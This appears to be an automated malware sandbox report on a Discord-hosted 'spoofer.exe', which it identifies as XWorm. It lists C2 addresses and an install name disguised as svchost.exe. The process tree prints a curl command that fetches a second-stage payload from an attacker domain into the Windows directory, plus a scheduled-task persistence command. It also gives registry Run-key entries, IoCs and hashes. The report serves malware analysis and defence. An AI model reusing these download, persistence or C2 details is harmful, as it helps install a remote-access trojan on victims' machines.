Analysis
-
max time kernel
884s -
max time network
882s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22/11/2024, 20:15
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1309185645029228554/1309612813534367844/spoofer.exe?ex=6742377a&is=6740e5fa&hm=2a92384535be3bfc27f3b4c8619e8ba5018ab9bb6d0dda552ac26cd032c0964c&
Resource
win10v2004-20241007-en
General
-
Target
https://cdn.discordapp.com/attachments/1309185645029228554/1309612813534367844/spoofer.exe?ex=6742377a&is=6740e5fa&hm=2a92384535be3bfc27f3b4c8619e8ba5018ab9bb6d0dda552ac26cd032c0964c&
Malware Config
Extracted
xworm
127.0.0.1:1337
104.198.168.179:1337
-
Install_directory
%Temp%
-
install_file
svchost.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0007000000023c6b-74.dat family_xworm behavioral1/memory/1720-76-0x0000000000E20000-0x0000000000E3A000-memory.dmp family_xworm -
Xworm family
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation StartMenuExperienceHost.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk StartMenuExperienceHost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk StartMenuExperienceHost.exe -
Executes dropped EXE 16 IoCs
pid Process 4000 spoofer.exe 1720 StartMenuExperienceHost.exe 5336 svchost.exe 1424 svchost.exe 5636 svchost.exe 5132 svchost.exe 4700 svchost.exe 960 svchost.exe 6124 svchost.exe 5620 svchost.exe 5156 svchost.exe 2960 svchost.exe 1084 svchost.exe 4836 svchost.exe 2308 svchost.exe 4812 svchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe" StartMenuExperienceHost.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 40 ip-api.com -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\StartMenuExperienceHost.exe curl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings taskmgr.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 860971.crdownload:SmartScreen msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2952 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1720 StartMenuExperienceHost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2420 msedge.exe 2420 msedge.exe 2560 msedge.exe 2560 msedge.exe 4372 identity_helper.exe 4372 identity_helper.exe 2204 msedge.exe 2204 msedge.exe 1720 StartMenuExperienceHost.exe 1720 StartMenuExperienceHost.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 5672 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 1720 StartMenuExperienceHost.exe Token: SeDebugPrivilege 1720 StartMenuExperienceHost.exe Token: SeDebugPrivilege 5336 svchost.exe Token: SeDebugPrivilege 5672 taskmgr.exe Token: SeSystemProfilePrivilege 5672 taskmgr.exe Token: SeCreateGlobalPrivilege 5672 taskmgr.exe Token: SeDebugPrivilege 1424 svchost.exe Token: SeDebugPrivilege 5636 svchost.exe Token: SeDebugPrivilege 5132 svchost.exe Token: SeDebugPrivilege 4700 svchost.exe Token: SeDebugPrivilege 960 svchost.exe Token: SeDebugPrivilege 6124 svchost.exe Token: SeDebugPrivilege 5620 svchost.exe Token: SeDebugPrivilege 5156 svchost.exe Token: SeDebugPrivilege 2960 svchost.exe Token: SeDebugPrivilege 1084 svchost.exe Token: SeDebugPrivilege 4836 svchost.exe Token: SeDebugPrivilege 2308 svchost.exe Token: SeDebugPrivilege 4812 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 2560 msedge.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe 5672 taskmgr.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4000 spoofer.exe 1720 StartMenuExperienceHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2560 wrote to memory of 4692 2560 msedge.exe 82 PID 2560 wrote to memory of 4692 2560 msedge.exe 82 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 4476 2560 msedge.exe 83 PID 2560 wrote to memory of 2420 2560 msedge.exe 84 PID 2560 wrote to memory of 2420 2560 msedge.exe 84 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 PID 2560 wrote to memory of 2816 2560 msedge.exe 85 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1309185645029228554/1309612813534367844/spoofer.exe?ex=6742377a&is=6740e5fa&hm=2a92384535be3bfc27f3b4c8619e8ba5018ab9bb6d0dda552ac26cd032c0964c&1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd64e246f8,0x7ffd64e24708,0x7ffd64e247182⤵PID:4692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2272 /prefetch:22⤵PID:4476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:82⤵PID:2816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:12⤵PID:3452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:12⤵PID:1328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:12⤵PID:1348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:12⤵PID:3196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 /prefetch:82⤵PID:2684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:12⤵PID:5044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:12⤵PID:3556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5208 /prefetch:82⤵PID:4124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:12⤵PID:3448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6324 /prefetch:82⤵PID:4768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4556 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2204
-
-
C:\Users\Admin\Downloads\spoofer.exe"C:\Users\Admin\Downloads\spoofer.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4000 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent3⤵PID:412
-
C:\Windows\system32\curl.execurl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent4⤵
- Drops file in Windows directory
PID:920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color b3⤵PID:3036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exe3⤵PID:644
-
C:\Windows\StartMenuExperienceHost.exeC:\Windows\StartMenuExperienceHost.exe4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1720 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Local\Temp\svchost.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:2952
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2264,1470117356069113468,18000354150374888656,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3088 /prefetch:22⤵PID:4328
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4740
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4036
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5336
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5672
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5964
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5636
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5132
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4700
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:960
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6124
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5620
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5156
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4836
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4812
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
152B
MD556a4f78e21616a6e19da57228569489b
SHA121bfabbfc294d5f2aa1da825c5590d760483bc76
SHA256d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb
SHA512c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b
-
Filesize
152B
MD5e443ee4336fcf13c698b8ab5f3c173d0
SHA19bf70b16f03820cbe3158e1f1396b07b8ac9d75a
SHA25679e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b
